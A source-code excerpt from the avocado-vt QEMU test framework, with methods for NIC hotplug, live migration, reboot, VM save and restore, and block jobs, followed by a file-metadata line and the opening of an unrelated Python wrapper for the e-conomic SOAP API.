def add_netdev(self, **params):
"""
Hotplug a netdev device.
:param params: NIC info. dict.
:return: netdev_id
"""
nic_name = params['nic_name']
nic = self.virtnet[nic_name]
nic_index = self.virtnet.nic_name_index(nic_name)
nic.set_if_none('netdev_id', utils_misc.generate_random_id())
nic.set_if_none('ifname', self.virtnet.generate_ifname(nic_index))
nic.set_if_none('netdev_extra_params',
params.get('netdev_extra_params'))
nic.set_if_none('nettype', 'bridge')
if nic.nettype in ['bridge', 'macvtap']: # implies tap
# destination is required, hard-code reasonable default if unset
# nic.set_if_none('netdst', 'virbr0')
# tapfd allocated/set in activate because requires system resources
nic.set_if_none('queues', '1')
ids = []
for i in range(int(nic.queues)):
ids.append(utils_misc.generate_random_id())
nic.set_if_none('tapfd_ids', ids)
elif nic.nettype == 'user':
pass # nothing to do
else: # unsupported nettype
raise virt_vm.VMUnknownNetTypeError(self.name, nic_name,
nic.nettype)
return nic.netdev_id
@error_context.context_aware
def del_netdev(self, nic_index_or_name):
"""
Remove netdev info. from nic on VM, does not deactivate.
:param: nic_index_or_name: name or index number for existing NIC
"""
nic = self.virtnet[nic_index_or_name]
error_context.context("removing netdev info from nic %s from vm %s" % (
nic, self.name))
for propertea in ['netdev_id', 'ifname', 'queues',
'tapfds', 'tapfd_ids', 'vectors']:
if propertea in nic:
del nic[propertea]
def add_nic(self, **params):
"""
Add new or setup existing NIC, optionally creating netdev if None
:param params: Parameters to set
:param nic_name: Name for existing or new device
:param nic_model: Model name to emulate
:param netdev_id: Existing qemu net device ID name, None to create new
:param mac: Optional MAC address, None to randomly generate.
"""
# returns existing or new nic object
nic = super(VM, self).add_nic(**params)
nic_index = self.virtnet.nic_name_index(nic.nic_name)
nic.set_if_none('vlan', str(nic_index))
nic.set_if_none('device_id', utils_misc.generate_random_id())
nic.set_if_none('queues', '1')
if 'netdev_id' not in nic:
# virtnet items are lists that act like dicts
nic.netdev_id = self.add_netdev(**dict(nic))
nic.set_if_none('nic_model', params['nic_model'])
nic.set_if_none('queues', params.get('queues', '1'))
if params.get("enable_msix_vectors") == "yes":
nic.set_if_none('vectors', 2 * int(nic.queues) + 2)
return nic
@error_context.context_aware
def activate_netdev(self, nic_index_or_name):
"""
Activate an inactive host-side networking device
:raise: IndexError if nic doesn't exist
:raise: VMUnknownNetTypeError: if nettype is unset/unsupported
:raise: IOError if TAP device node cannot be opened
:raise: VMAddNetDevError: if operation failed
"""
nic = self.virtnet[nic_index_or_name]
error_context.context("Activating netdev for %s based on %s" %
(self.name, nic))
msg_sfx = ("nic %s on vm %s with attach_cmd " %
(self.virtnet[nic_index_or_name], self.name))
attach_cmd = "netdev_add"
if nic.nettype in ['bridge', 'macvtap']:
error_context.context("Opening tap device node for %s " % nic.ifname,
logging.debug)
if nic.nettype == "bridge":
tun_tap_dev = "/dev/net/tun"
python_tapfds = utils_net.open_tap(tun_tap_dev,
nic.ifname,
queues=nic.queues,
vnet_hdr=False)
elif nic.nettype == "macvtap":
macvtap_mode = self.params.get("macvtap_mode", "vepa")
o_macvtap = utils_net.create_macvtap(nic.ifname, macvtap_mode,
nic.netdst, nic.mac)
tun_tap_dev = o_macvtap.get_device()
python_tapfds = utils_net.open_macvtap(o_macvtap, nic.queues)
qemu_fds = "/proc/%s/fd" % self.get_pid()
openfd_list = os.listdir(qemu_fds)
for i in range(int(nic.queues)):
error_context.context("Assigning tap %s to qemu by fd" %
nic.tapfd_ids[i], logging.info)
self.monitor.getfd(int(python_tapfds.split(':')[i]),
nic.tapfd_ids[i])
n_openfd_list = os.listdir(qemu_fds)
new_fds = list(set(n_openfd_list) - set(openfd_list))
if not new_fds:
err_msg = "Can't get the fd that qemu process opened!"
raise virt_vm.VMAddNetDevError(err_msg)
qemu_tapfds = [fd for fd in new_fds if os.readlink(
os.path.join(qemu_fds, fd)) == tun_tap_dev]
if not qemu_tapfds or len(qemu_tapfds) != int(nic.queues):
err_msg = "Can't get the tap fd in qemu process!"
raise virt_vm.VMAddNetDevError(err_msg)
nic.set_if_none("tapfds", ":".join(qemu_tapfds))
if not self.devices:
err_msg = "Can't add nic for VM which is not running."
raise virt_vm.VMAddNetDevError(err_msg)
if ((int(nic.queues)) > 1 and
',fds=' in self.devices.get_help_text()):
attach_cmd += " type=tap,id=%s,fds=%s" % (nic.device_id,
nic.tapfds)
else:
attach_cmd += " type=tap,id=%s,fd=%s" % (nic.device_id,
nic.tapfds)
error_context.context("Raising interface for " + msg_sfx + attach_cmd,
logging.debug)
utils_net.bring_up_ifname(nic.ifname)
# assume this will puke if netdst unset
if nic.netdst is not None and nic.nettype == "bridge":
error_context.context("Raising bridge for " + msg_sfx + attach_cmd,
logging.debug)
utils_net.add_to_bridge(nic.ifname, nic.netdst)
elif nic.nettype == 'user':
attach_cmd += " user,id=%s" % nic.device_id
elif nic.nettype == 'none':
attach_cmd += " none"
else: # unsupported nettype
raise virt_vm.VMUnknownNetTypeError(self.name, nic_index_or_name,
nic.nettype)
if 'netdev_extra_params' in nic and nic.netdev_extra_params:
attach_cmd += nic.netdev_extra_params
error_context.context(
"Hotplugging " +
msg_sfx +
attach_cmd,
logging.debug)
if self.monitor.protocol == 'qmp':
self.monitor.send_args_cmd(attach_cmd)
else:
self.monitor.send_args_cmd(attach_cmd, convert=False)
network_info = self.monitor.info("network")
if nic.device_id not in network_info:
# Don't leave resources dangling
self.deactivate_netdev(nic_index_or_name)
raise virt_vm.VMAddNetDevError(("Failed to add netdev: %s for " %
nic.device_id) + msg_sfx +
attach_cmd)
@error_context.context_aware
def activate_nic(self, nic_index_or_name):
"""
Activate an VM's inactive NIC device and verify state
:param nic_index_or_name: name or index number for existing NIC
"""
error_context.context("Retrieving info for NIC %s on VM %s" % (
nic_index_or_name, self.name))
nic = self.virtnet[nic_index_or_name]
device_add_cmd = "device_add"
if 'nic_model' in nic:
device_add_cmd += ' driver=%s' % nic.nic_model
device_add_cmd += ",netdev=%s" % nic.device_id
if 'mac' in nic:
device_add_cmd += ",mac=%s" % nic.mac
device_add_cmd += ",id=%s" % nic.nic_name
if nic['nic_model'] == 'virtio-net-pci':
if int(nic['queues']) > 1:
device_add_cmd += ",mq=on"
if 'vectors' in nic:
device_add_cmd += ",vectors=%s" % nic.vectors
device_add_cmd += nic.get('nic_extra_params', '')
if 'romfile' in nic:
device_add_cmd += ",romfile=%s" % nic.romfile
error_context.context("Activating nic on VM %s with monitor command %s" % (
self.name, device_add_cmd))
if self.monitor.protocol == 'qmp':
self.monitor.send_args_cmd(device_add_cmd)
else:
self.monitor.send_args_cmd(device_add_cmd, convert=False)
error_context.context("Verifying nic %s shows in qtree" % nic.nic_name)
qtree = self.monitor.info("qtree")
if nic.nic_name not in qtree:
logging.error(qtree)
raise virt_vm.VMAddNicError("Device %s was not plugged into qdev"
"tree" % nic.nic_name)
@error_context.context_aware
def deactivate_nic(self, nic_index_or_name, wait=20):
"""
Reverses what activate_nic did
:param nic_index_or_name: name or index number for existing NIC
:param wait: Time test will wait for the guest to unplug the device
"""
nic = self.virtnet[nic_index_or_name]
error_context.context("Removing nic %s from VM %s" %
(nic_index_or_name, self.name))
nic_del_cmd = "device_del id=%s" % (nic.nic_name)
if self.monitor.protocol == 'qmp':
self.monitor.send_args_cmd(nic_del_cmd)
else:
self.monitor.send_args_cmd(nic_del_cmd, convert=True)
if wait:
logging.info("waiting for the guest to finish the unplug")
nic_eigenvalue = r'dev:\s+%s,\s+id\s+"%s"' % (nic.nic_model,
nic.nic_name)
if not utils_misc.wait_for(lambda: nic_eigenvalue not in
self.monitor.info("qtree"),
wait, 5, 1):
raise virt_vm.VMDelNicError("Device is not unplugged by "
"guest, please check whether the "
"hotplug module was loaded in "
"guest")
@error_context.context_aware
def deactivate_netdev(self, nic_index_or_name):
"""
Reverses what activate_netdev() did
:param: nic_index_or_name: name or index number for existing NIC
"""
# FIXME: Need to down interface & remove from bridge????
nic = self.virtnet[nic_index_or_name]
netdev_id = nic.device_id
error_context.context("removing netdev id %s from vm %s" %
(netdev_id, self.name))
nic_del_cmd = "netdev_del id=%s" % netdev_id
if self.monitor.protocol == 'qmp':
self.monitor.send_args_cmd(nic_del_cmd)
else:
self.monitor.send_args_cmd(nic_del_cmd, convert=True)
network_info = self.monitor.info("network")
netdev_eigenvalue = r'netdev\s+=\s+%s' % netdev_id
if netdev_eigenvalue in network_info:
raise virt_vm.VMDelNetDevError("Fail to remove netdev %s" %
netdev_id)
if nic.nettype == 'macvtap':
tap = utils_net.Macvtap(nic.ifname)
tap.delete()
@error_context.context_aware
def del_nic(self, nic_index_or_name):
"""
Undefine nic prameters, reverses what add_nic did.
:param nic_index_or_name: name or index number for existing NIC
:param wait: Time test will wait for the guest to unplug the device
"""
super(VM, self).del_nic(nic_index_or_name)
@error_context.context_aware
def send_fd(self, fd, fd_name="migfd"):
"""
Send file descriptor over unix socket to VM.
:param fd: File descriptor.
:param fd_name: File descriptor identificator in VM.
"""
error_context.context(
"Send fd %d like %s to VM %s" %
(fd, fd_name, self.name))
logging.debug("Send file descriptor %s to source VM.", fd_name)
if self.monitor.protocol == 'human':
self.monitor.cmd("getfd %s" % (fd_name), fd=fd)
elif self.monitor.protocol == 'qmp':
self.monitor.cmd("getfd", args={'fdname': fd_name}, fd=fd)
error_context.context()
def mig_finished(self):
ret = True
if (self.params["display"] == "spice" and
self.get_spice_var("spice_seamless_migration") == "on"):
s = self.monitor.info("spice")
if isinstance(s, str):
ret = len(re.findall("migrated: true", s, re.I)) > 0
else:
ret = len(re.findall("true", str(s.get("migrated")), re.I)) > 0
o = self.monitor.info("migrate")
if isinstance(o, str):
return ret and ("status: active" not in o)
else:
return ret and (o.get("status") != "active")
def mig_succeeded(self):
o = self.monitor.info("migrate")
if isinstance(o, str):
return "status: completed" in o
else:
return o.get("status") == "completed"
def mig_failed(self):
o = self.monitor.info("migrate")
if isinstance(o, str):
return "status: failed" in o
else:
return o.get("status") == "failed"
def mig_cancelled(self):
if self.mig_succeeded():
raise virt_vm.VMMigrateCancelError(
"Migration completed successfully")
elif self.mig_failed():
raise virt_vm.VMMigrateFailedError("Migration failed")
o = self.monitor.info("migrate")
if isinstance(o, str):
return ("Migration status: cancelled" in o or
"Migration status: canceled" in o)
else:
return (o.get("status") == "cancelled" or
o.get("status") == "canceled")
def wait_for_migration(self, timeout):
if not utils_misc.wait_for(self.mig_finished, timeout, 2, 2,
"Waiting for migration to complete"):
raise virt_vm.VMMigrateTimeoutError("Timeout expired while waiting"
" for migration to finish")
@error_context.context_aware
def migrate(self, timeout=virt_vm.BaseVM.MIGRATE_TIMEOUT, protocol="tcp",
cancel_delay=None, offline=False, stable_check=False,
clean=True, save_path=data_dir.get_tmp_dir(),
dest_host="localhost",
remote_port=None, not_wait_for_migration=False,
fd_src=None, fd_dst=None, migration_exec_cmd_src=None,
migration_exec_cmd_dst=None, env=None,
migrate_capabilities=None):
"""
Migrate the VM.
If the migration is local, the VM object's state is switched with that
of the destination VM. Otherwise, the state is switched with that of
a dead VM (returned by self.clone()).
:param timeout: Time to wait for migration to complete.
:param protocol: Migration protocol (as defined in MIGRATION_PROTOS)
:param cancel_delay: If provided, specifies a time duration after which
migration will be canceled. Used for testing migrate_cancel.
:param offline: If True, pause the source VM before migration.
:param stable_check: If True, compare the VM's state after migration to
its state before migration and raise an exception if they
differ.
:param clean: If True, delete the saved state files (relevant only if
stable_check is also True).
:param save_path: The path for state files.
:param dest_host: Destination host (defaults to 'localhost').
:param remote_port: Port to use for remote migration.
:param not_wait_for_migration: If True migration start but not wait till
the end of migration.
:param fd_s: File descriptor for migration to which source
VM write data. Descriptor is closed during the migration.
:param fd_d: File descriptor for migration from which destination
VM read data.
:param migration_exec_cmd_src: Command to embed in '-incoming "exec: "'
(e.g. 'exec:gzip -c > filename') if migration_mode is 'exec'
default to listening on a random TCP port
:param migration_exec_cmd_dst: Command to embed in '-incoming "exec: "'
(e.g. 'gzip -c -d filename') if migration_mode is 'exec'
default to listening on a random TCP port
:param env: Dictionary with test environment
:param migrate_capabilities: The capabilities for migration to need set.
"""
if protocol not in self.MIGRATION_PROTOS:
raise virt_vm.VMMigrateProtoUnknownError(protocol)
error_context.base_context("migrating '%s'" % self.name)
local = dest_host == "localhost"
mig_fd_name = None
if protocol == "fd":
# Check if descriptors aren't None for local migration.
if local and (fd_dst is None or fd_src is None):
(fd_dst, fd_src) = os.pipe()
mig_fd_name = "migfd_%d_%d" % (fd_src, time.time())
self.send_fd(fd_src, mig_fd_name)
os.close(fd_src)
clone = self.clone()
if self.params.get('qemu_dst_binary', None) is not None:
clone.params[
'qemu_binary'] = utils_misc.get_qemu_dst_binary(self.params)
if env:
env.register_vm("%s_clone" % clone.name, clone)
if (local and not (migration_exec_cmd_src and
"gzip" in migration_exec_cmd_src)):
error_context.context("creating destination VM")
if stable_check:
# Pause the dest vm after creation
extra_params = clone.params.get("extra_params", "") + " -S"
clone.params["extra_params"] = extra_params
clone.create(migration_mode=protocol, mac_source=self,
migration_fd=fd_dst,
migration_exec_cmd=migration_exec_cmd_dst)
if fd_dst:
os.close(fd_dst)
error_context.context()
try:
if (self.params["display"] == "spice" and local and
not (protocol == "exec" and
(migration_exec_cmd_src and "gzip" in migration_exec_cmd_src))):
host_ip = utils_net.get_host_ip_address(self.params)
dest_port = clone.spice_options.get('spice_port', '')
if self.params.get("spice_ssl") == "yes":
dest_tls_port = clone.spice_options.get("spice_tls_port",
"")
cert_s = clone.spice_options.get("spice_x509_server_subj",
"")
cert_subj = "%s" % cert_s[1:]
cert_subj += host_ip
cert_subj = "\"%s\"" % cert_subj
else:
dest_tls_port = ""
cert_subj = ""
logging.debug("Informing migration to spice client")
commands = ["__com.redhat_spice_migrate_info",
"spice_migrate_info",
"client_migrate_info"]
cmdline = ""
for command in commands:
try:
self.monitor.verify_supported_cmd(command)
except qemu_monitor.MonitorNotSupportedCmdError:
continue
# spice_migrate_info requires host_ip, dest_port
# client_migrate_info also requires protocol
cmdline = "%s " % (command)
if command == "client_migrate_info":
cmdline += " protocol=%s," % self.params['display']
cmdline += " hostname=%s" % (host_ip)
if dest_port:
cmdline += ",port=%s" % dest_port
if dest_tls_port:
cmdline += ",tls-port=%s" % dest_tls_port
if cert_subj:
cmdline += ",cert-subject=%s" % cert_subj
break
if cmdline:
self.monitor.send_args_cmd(cmdline)
if protocol in ["tcp", "rdma", "x-rdma"]:
if local:
uri = protocol + ":localhost:%d" % clone.migration_port
else:
uri = protocol + ":%s:%d" % (dest_host, remote_port)
elif protocol == "unix":
uri = "unix:%s" % clone.migration_file
elif protocol == "exec":
if local:
if not migration_exec_cmd_src:
uri = '"exec:nc localhost %s"' % clone.migration_port
else:
uri = '"exec:%s"' % (migration_exec_cmd_src)
else:
uri = '"exec:%s"' % (migration_exec_cmd_src)
elif protocol == "fd":
uri = "fd:%s" % mig_fd_name
if offline is True:
self.monitor.cmd("stop")
if migrate_capabilities:
error_context.context(
"Set migrate capabilities.", logging.info)
for key, value in migrate_capabilities.items():
state = value == "on"
self.monitor.set_migrate_capability(state, key)
s = self.monitor.get_migrate_capability(key)
if s != state:
msg = ("Migrate capability '%s' should be '%s', "
"but actual result is '%s'" % (key, state, s))
raise exceptions.TestError(msg)
threads_before_migrate = self.get_qemu_threads()
logging.info("Migrating to %s", uri)
self.monitor.migrate(uri)
if not_wait_for_migration:
return clone
if self.params.get("enable_check_mig_thread", "no") == "yes":
threads_during_migrate = self.get_qemu_threads()
if not (len(threads_during_migrate) >
len(threads_before_migrate)):
raise virt_vm.VMMigrateFailedError("Cannot find new thread"
" for migration.")
if cancel_delay:
error_context.context("Do migrate_cancel after %d seconds" %
cancel_delay, logging.info)
time.sleep(cancel_delay)
self.monitor.cmd("migrate_cancel")
if not utils_misc.wait_for(self.mig_cancelled, 60, 2, 2,
"Waiting for migration "
"cancellation"):
raise virt_vm.VMMigrateCancelError(
"Cannot cancel migration")
return
self.wait_for_migration(timeout)
if (local and (migration_exec_cmd_src and
"gzip" in migration_exec_cmd_src)):
error_context.context("creating destination VM")
if stable_check:
# Pause the dest vm after creation
extra_params = clone.params.get("extra_params", "") + " -S"
clone.params["extra_params"] = extra_params
clone.create(migration_mode=protocol, mac_source=self,
migration_fd=fd_dst,
migration_exec_cmd=migration_exec_cmd_dst)
self.verify_alive()
# Report migration status
if self.mig_succeeded():
logging.info("Migration completed successfully")
elif self.mig_failed():
raise virt_vm.VMMigrateFailedError("Migration failed")
else:
raise virt_vm.VMMigrateFailedError("Migration ended with "
"unknown status")
# Switch self <-> clone
temp = self.clone(copy_state=True)
self.__dict__ = clone.__dict__
clone = temp
# From now on, clone is the source VM that will soon be destroyed
# and self is the destination VM that will remain alive. If this
# is remote migration, self is a dead VM object.
error_context.context("after migration")
if local:
time.sleep(1)
self.verify_alive()
if local and stable_check:
try:
save1 = os.path.join(save_path, "src-" + clone.instance)
save2 = os.path.join(save_path, "dst-" + self.instance)
clone.save_to_file(save1)
self.save_to_file(save2)
# Fail if we see deltas
md5_save1 = crypto.hash_file(save1)
md5_save2 = crypto.hash_file(save2)
if md5_save1 != md5_save2:
raise virt_vm.VMMigrateStateMismatchError()
finally:
if clean:
if os.path.isfile(save1):
os.remove(save1)
if os.path.isfile(save2):
os.remove(save2)
finally:
# If we're doing remote migration and it's completed successfully,
# self points to a dead VM object
if not not_wait_for_migration:
if self.is_alive():
self.monitor.cmd("cont")
clone.destroy(gracefully=False)
if env:
env.unregister_vm("%s_clone" % self.name)
@error_context.context_aware
def reboot(self, session=None, method="shell", nic_index=0,
timeout=virt_vm.BaseVM.REBOOT_TIMEOUT, serial=False):
"""
Reboot the VM and wait for it to come back up by trying to log in until
timeout expires.
:param session: A shell session object or None.
:param method: Reboot method. Can be "shell" (send a shell reboot
command) or "system_reset" (send a system_reset monitor command).
:param nic_index: Index of NIC to access in the VM, when logging in
after rebooting.
:param timeout: Time to wait for login to succeed (after rebooting).
:param serial: Serial login or not (default is False).
:return: A new shell session object.
"""
def __get_session(nic_index=0, serial=False):
"""
Get connection to VM
"""
if serial:
return self.serial_login()
return self.login(nic_index=nic_index)
def __go_down(session, nic_index, serial):
"""
Check guest rebooting.
"""
timeout = self.CLOSE_SESSION_TIMEOUT
try:
if serial:
patterns = [r".*[Rr]ebooting.*", r".*[Rr]estarting system.*",
r".*[Mm]achine restart.*", r".*Linux version.*"]
if session.read_until_any_line_matches(
patterns, timeout=timeout):
session.close()
return True
else:
session = __get_session(nic_index, serial)
session.close()
return False
except (remote.LoginError, aexpect.ShellError):
return True
return False
def wait_for_go_down(session, nic_index, serial, timeout):
""" Wait for VM go down
:param session: VM session object
:param nic_index: which nic what to login VM
:param serial: login VM via serial console or not
:param timeout: timeout wait for VM go down
"""
if not utils_misc.wait_for(
lambda: __go_down(session, nic_index, serial),
timeout=timeout):
raise virt_vm.VMRebootError("Guest refuses to go down")
logging.info("VM go down, wait for it boot up")
def shell_reboot(session, nic_index, serial, timeout):
"""
Reboot guest OS via shell command
:param session: VM session object
:param nic_index: which nic what to login VM
:param serial: login VM via serial console or not
:param timeout: timeout wait for VM go down
"""
if not session or not session.is_responsive():
session = __get_session(nic_index=nic_index, serial=serial)
console = session.cmd("tty", ignore_all_errors=True)
serial = console and ("pts" not in console)
reboot_cmd = self.params.get("reboot_command")
step_info = "Send %s command, wait for VM rebooting" % reboot_cmd
error_context.context(step_info)
session.sendline(reboot_cmd)
wait_for_go_down(session, nic_index, serial, timeout=timeout)
error_context.base_context("rebooting '%s'" % self.name, logging.info)
error_context.context("before reboot")
error_context.context()
if method == "shell":
shell_reboot(session, nic_index, serial, timeout / 2)
elif method == "system_reset":
self.system_reset()
else:
raise virt_vm.VMRebootError("Unknown reboot method: %s" % method)
if self.params.get("mac_changeable") == "yes":
utils_net.update_mac_ip_address(self, self.params)
error_context.context("logging in after reboot", logging.info)
if serial:
return self.wait_for_serial_login(timeout=(timeout / 2))
return self.wait_for_login(nic_index=nic_index, timeout=(timeout / 2))
def send_key(self, keystr):
"""
Send a key event to the VM.
:param keystr: A key event string (e.g. "ctrl-alt-delete")
"""
# For compatibility with versions of QEMU that do not recognize all
# key names: replace keyname with the hex value from the dict, which
# QEMU will definitely accept
key_mapping = {"semicolon": "0x27",
"comma": "0x33",
"dot": "0x34",
"slash": "0x35"}
for key, value in key_mapping.items():
keystr = keystr.replace(key, value)
self.monitor.sendkey(keystr)
time.sleep(0.2)
# should this really be expected from VMs of all hypervisor types?
def screendump(self, filename, debug=True):
try:
if self.catch_monitor:
self.catch_monitor.screendump(filename=filename, debug=debug)
except qemu_monitor.MonitorError, e:
logging.warn(e)
def save_to_file(self, path):
"""
Override BaseVM save_to_file method
"""
self.verify_status('paused') # Throws exception if not
# Set high speed 1TB/S
self.monitor.migrate_set_speed(str(2 << 39))
self.monitor.migrate_set_downtime(self.MIGRATE_TIMEOUT)
logging.debug("Saving VM %s to %s" % (self.name, path))
# Can only check status if background migration
self.monitor.migrate("exec:cat>%s" % path, wait=False)
utils_misc.wait_for(
# no monitor.migrate-status method
lambda:
re.search("(status.*completed)",
str(self.monitor.info("migrate")), re.M),
self.MIGRATE_TIMEOUT, 2, 2,
"Waiting for save to %s to complete" % path)
# Restore the speed and downtime to default values
self.monitor.migrate_set_speed(str(32 << 20))
self.monitor.migrate_set_downtime(0.03)
# Base class defines VM must be off after a save
self.monitor.cmd("system_reset")
self.verify_status('paused') # Throws exception if not
def restore_from_file(self, path):
"""
Override BaseVM restore_from_file method
"""
self.verify_status('paused') # Throws exception if not
logging.debug("Restoring VM %s from %s" % (self.name, path))
# Rely on create() in incoming migration mode to do the 'right thing'
self.create(name=self.name, params=self.params, root_dir=self.root_dir,
timeout=self.MIGRATE_TIMEOUT, migration_mode="exec",
migration_exec_cmd="cat " + path, mac_source=self)
self.verify_status('running') # Throws exception if not
def savevm(self, tag_name):
"""
Override BaseVM savevm method
"""
self.verify_status('paused') # Throws exception if not
logging.debug("Saving VM %s to %s" % (self.name, tag_name))
self.monitor.send_args_cmd("savevm id=%s" % tag_name)
self.monitor.cmd("system_reset")
self.verify_status('paused') # Throws exception if not
def loadvm(self, tag_name):
"""
Override BaseVM loadvm method
"""
self.verify_status('paused') # Throws exception if not
logging.debug("Loading VM %s from %s" % (self.name, tag_name))
self.monitor.send_args_cmd("loadvm id=%s" % tag_name)
self.verify_status('paused') # Throws exception if not
def pause(self):
"""
Pause the VM operation.
"""
self.monitor.cmd("stop")
def resume(self):
"""
Resume the VM operation in case it's stopped.
"""
self.monitor.cmd("cont")
def set_link(self, netdev_name, up):
"""
Set link up/down.
:param name: Link name
:param up: Bool value, True=set up this link, False=Set down this link
"""
self.monitor.set_link(netdev_name, up)
def get_block_old(self, blocks_info, p_dict={}):
"""
Get specified block device from monitor's info block command.
The block device is defined by parameter in p_dict.
:param p_dict: Dictionary that contains parameters and its value used
to define specified block device.
:param blocks_info: the results of monitor command 'info block'
:return: Matched block device name, None when not find any device.
"""
if isinstance(blocks_info, str):
for block in blocks_info.splitlines():
match = True
for key, value in p_dict.iteritems():
if value is True:
check_str = "%s=1" % key
elif value is False:
check_str = "%s=0" % key
else:
check_str = "%s=%s" % (key, value)
if check_str not in block:
match = False
break
if match:
return block.split(":")[0]
else:
for block in blocks_info:
match = True
for key, value in p_dict.iteritems():
if isinstance(value, bool):
check_str = "u'%s': %s" % (key, value)
else:
check_str = "u'%s': u'%s'" % (key, value)
if check_str not in str(block):
match = False
break
if match:
return block['device']
return None
def process_info_block(self, blocks_info):
"""
Process the info block, so that can deal with the new and old
qemu format.
:param blocks_info: the output of qemu command
'info block'
"""
block_list = []
block_entry = []
for block in blocks_info.splitlines():
if block:
block_entry.append(block.strip())
else:
block_list.append(' '.join(block_entry))
block_entry = []
# don't forget the last one
block_list.append(' '.join(block_entry))
return block_list
def get_block(self, p_dict={}):
"""
Get specified block device from monitor's info block command.
The block device is defined by parameter in p_dict.
:param p_dict: Dictionary that contains parameters and its value used
to define specified block device.
:return: Matched block device name, None when not find any device.
"""
blocks_info = self.monitor.info("block")
block = self.get_block_old(blocks_info, p_dict)
if block:
return block
block_list = self.process_info_block(blocks_info)
for block in block_list:
for key, value in p_dict.iteritems():
# for new qemu we just deal with key = [removable,
# file,backing_file], for other types key, we should
# fixup later
logging.info("block = %s" % block)
if key == 'removable':
if value is False:
if 'Removable device' not in block:
return block.split(":")[0]
elif value is True:
if 'Removable device' in block:
return block.split(":")[0]
# file in key means both file and backing_file
if ('file' in key) and (value in block):
return block.split(":")[0]
return None
def check_block_locked(self, value):
"""
Check whether specified block device is locked or not.
Return True, if device is locked, else False.
:param vm: VM object
:param value: Parameter that can specify block device.
Can be any possible identification of a device,
Such as device name/image file name/...
:return: True if device is locked, False if device is unlocked.
"""
assert value, "Device identification not specified"
blocks_info = self.monitor.info("block")
assert value in str(blocks_info), \
"Device %s not listed in monitor's output" % value
if isinstance(blocks_info, str):
lock_str = "locked=1"
lock_str_new = "locked"
no_lock_str = "not locked"
for block in blocks_info.splitlines():
if (value in block) and (lock_str in block):
return True
# deal with new qemu
block_list = self.process_info_block(blocks_info)
for block_new in block_list:
if (value in block_new) and ("Removable device" in block_new):
if no_lock_str in block_new:
return False
elif lock_str_new in block_new:
return True
else:
for block in blocks_info:
if value in str(block):
return block['locked']
return False
def live_snapshot(self, base_file, snapshot_file,
snapshot_format="qcow2"):
"""
Take a live disk snapshot.
:param base_file: base file name
:param snapshot_file: snapshot file name
:param snapshot_format: snapshot file format
:return: File name of disk snapshot.
"""
device = self.get_block({"file": base_file})
output = self.monitor.live_snapshot(device, snapshot_file,
format=snapshot_format)
logging.debug(output)
device = self.get_block({"file": snapshot_file})
if device:
current_file = device
else:
current_file = None
return current_file
def block_stream(self, device, speed, base=None, correct=True):
"""
start to stream block device, aka merge snapshot;
:param device: device ID;
:param speed: limited speed, default unit B/s;
:param base: base file;
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("block_stream_cmd", "block-stream")
return self.monitor.block_stream(device, speed, base,
cmd, correct=correct)
def block_mirror(self, device, target, sync,
correct=True, **kwargs):
"""
Mirror block device to target file;
:param device: device ID
:param target: destination image file name;
:param sync: what parts of the disk image should be copied to the
destination;
:param correct: auto correct cmd, correct by default
:param kwargs: optional keyword arguments including but not limited to below
:keyword Args:
format (str): format of target image file
mode (str): target image create mode, 'absolute-paths' or 'existing'
speed (int): maximum speed of the streaming job, in bytes per second
replaces (str): the block driver node name to replace when finished
granularity (int): granularity of the dirty bitmap, in bytes
buf_size (int): maximum amount of data in flight from source to target, in bytes
on-source-error (str): the action to take on an error on the source
on-target-error (str): the action to take on an error on the target
"""
cmd = self.params.get("block_mirror_cmd", "drive-mirror")
return self.monitor.block_mirror(device, target, sync, cmd,
correct=correct, **kwargs)
def block_reopen(self, device, new_image, format="qcow2", correct=True):
"""
Reopen a new image, no need to do this step in rhel7 host
:param device: device ID
:param new_image: new image filename
:param format: new image format
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("block_reopen_cmd", "block-job-complete")
return self.monitor.block_reopen(device, new_image,
format, cmd, correct=correct)
def cancel_block_job(self, device, correct=True):
"""
cancel active job on the image_file
:param device: device ID
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("block_job_cancel_cmd", "block-job-cancel")
return self.monitor.cancel_block_job(device, cmd, correct=correct)
def pause_block_job(self, device, correct=True):
"""
Pause an active block streaming operation.
:param device: device ID
:param correct: auto correct command, correct by default
:return: The command's output
"""
cmd = self.params.get("block_job_pause_cmd", "block-job-pause")
return self.monitor.pause_block_job(device, cmd, correct=correct)
def resume_block_job(self, device, correct=True):
"""
Resume a paused block streaming operation.
:param device: device ID
:param correct: auto correct command, correct by default
:return: The command's output
"""
cmd = self.params.get("block_job_resume_cmd", "block-job-resume")
return self.monitor.resume_block_job(device, cmd, correct=correct)
def set_job_speed(self, device, speed="0", correct=True):
"""
set max speed of block job;
:param device: device ID
:param speed: max speed of block job
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("set_block_job_speed", "block-job-set-speed")
return self.monitor.set_block_job_speed(device, speed,
cmd, correct=correct)
def get_job_status(self, device):
"""
get block job info;
:param device: device ID
"""
return self.monitor.query_block_job(device)
def eject_cdrom(self, device, force=False):
"""
Eject cdrom and open door of the CDROM;
:param device: device ID;
:param force: force eject or not;
"""
return self.monitor.eject_cdrom(device, force)
def change_media(self, device, target):
"""
Change media of cdrom;
:param device: Device ID;
:param target: new media file;
"""
return self.monitor.change_media(device, target)
def balloon(self, size):
"""
Balloon memory to given size megat-bytes
:param size: memory size in mega-bytes
"""
if isinstance(size, int):
size = "%s MB" % size
normalize_data_size = utils_misc.normalize_data_size
size = int(float(normalize_data_size(size, 'B', '1024')))
return self.monitor.balloon(size)
def system_reset(self):
""" Send system_reset to monitor"""
return self.monitor.system_reset()
|
will-Do/avocado-vt
|
virttest/qemu_vm.py
|
Python
|
gpl-2.0
| 189,844
|
"""
Model Abstraction of e-economic.com API
"""
import copy
import re
import os
import base64
from collections import defaultdict
from suds.client import Client
class ObjectDoesNotExist(BaseException):
pass
class MultipleObjectsReturned(BaseException):
pass
class EConomicsService(object):
"""
Interface for e-conomic WSDL service
"""
def __init__(self, service, model_factory, soap_factory, codec):
self.service = service
self.model_factory = model_factory
self.soap_factory = soap_factory
self.ncalls = 0
self.codec = codec
def fetch_list(self, name, expected_wsdltype, *args, **kw):
result = getattr(self.service, name)(*args)
self.ncalls += 1
if not result:
return []
if expected_wsdltype and expected_wsdltype not in result.__keylist__:
return [result]
return result[0]
def fetch(self, name, *args, **kw):
return getattr(self.service, name)(*args)
def upgrade_to_order(self, handle, order_model):
hnd = self.fetch('Quotation_UpgradeToOrder', handle)
return self.model_factory.get_or_create_instance(self, order_model, hnd)
